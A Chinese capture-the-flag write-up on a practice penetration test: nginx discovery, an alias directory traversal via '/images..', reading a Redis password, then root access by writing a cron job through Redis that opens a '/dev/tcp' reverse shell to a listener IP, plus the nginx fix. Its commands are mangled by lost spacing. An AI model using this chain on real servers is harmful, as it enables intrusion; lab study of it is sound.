记一次web渗透做题思路解析

📅 2026/8/6 5:15:12
记一次web渗透做题思路解析
描述你是一名网络安全服务工程师现在需要你对A集团网站进行安全防护找出其中的漏洞点。1、对目标服务器进行信息搜集将web站点监听的端口号和版本信息作为flag值提交提交格式flag{端口版本}由于不知道服务器的IP扫一下找的web站点所以是8081端口发现为nginx服务。2、对目标服务器进行渗透测试将触发漏洞的关键手段作为flag值提交提交格式flag{*****}先看看服务器的web有什么东西发现没有什么爆破一下目录试试返回上级发现目录穿越漏洞这里的触发漏洞的关键手段就是/images,,.3、对目标服务器进行渗透测试发现目标存在数据库服务将该数据库服务的登录密码作为flag值提交提交格式flag{******}扫描端口时可以看到有一个6379端口根据信息看的出是redis数据库这里直接利用目录穿越漏洞得知密码4、对目标服务器进行渗透测试将root家目录中的flag文件内容提交提交格式flag{******}设置监听端口使用密码连接目标redis服务并尝试计划任务提权redis-cli-htarget_ip-pserver_port-aredis_passwordconfigsetdir/var/spool/cronconfigsetdbfilename rootsetxxx\n\n*/1 * * * * /bin/bash -i/dev/tcp/192.168.189.128/4545 01\n\nsave服务器上线5、对目标服务器进行渗透测试对目标web服务存在的漏洞点进行修复将修复时所添加的内容进行md5加密后作为flag值提交提交格式flag{******}通过“images…/”访问时会被替换为别名images/…/导致目录穿越所以只需要在location指定的别名最后添加一个斜杆即可加密一下即可